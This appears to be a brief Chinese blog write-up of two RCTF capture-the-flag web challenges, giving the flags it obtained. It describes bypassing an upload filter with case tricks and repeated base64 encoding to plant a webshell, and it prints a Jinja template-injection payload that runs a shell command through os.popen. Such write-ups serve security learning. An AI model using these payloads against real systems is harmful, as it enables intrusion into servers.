RCTF | 风尘孤狼
0%

RCTF

img

前言

48h的比赛,题目质量很好,只看了web,写了两道题目,记录一下吧,其他题目也看大佬的wp了,先学习一下,就不复现了,期末考试没时间

easy_upload

文件上传类型题目

文件名通过大小写绕过,文件内容先使用base64反复加密编码数据进行欺骗绕过过滤

img

成功webshell之后命令执行得到flag

img

RCTF{ar3_u_s1ng1e_d0g?}

filechecker_mini

ssti

img

*\#! /{{config.__class__.__init__.__globals__['os'].popen('cat /f*').read()}}*

得到flag

RCTF{Just_A_5mall_Tr1ck_mini1i1i1__Fl4g_Y0u_gOtt777!!!}

制作不易,如若感觉写的不错,欢迎打赏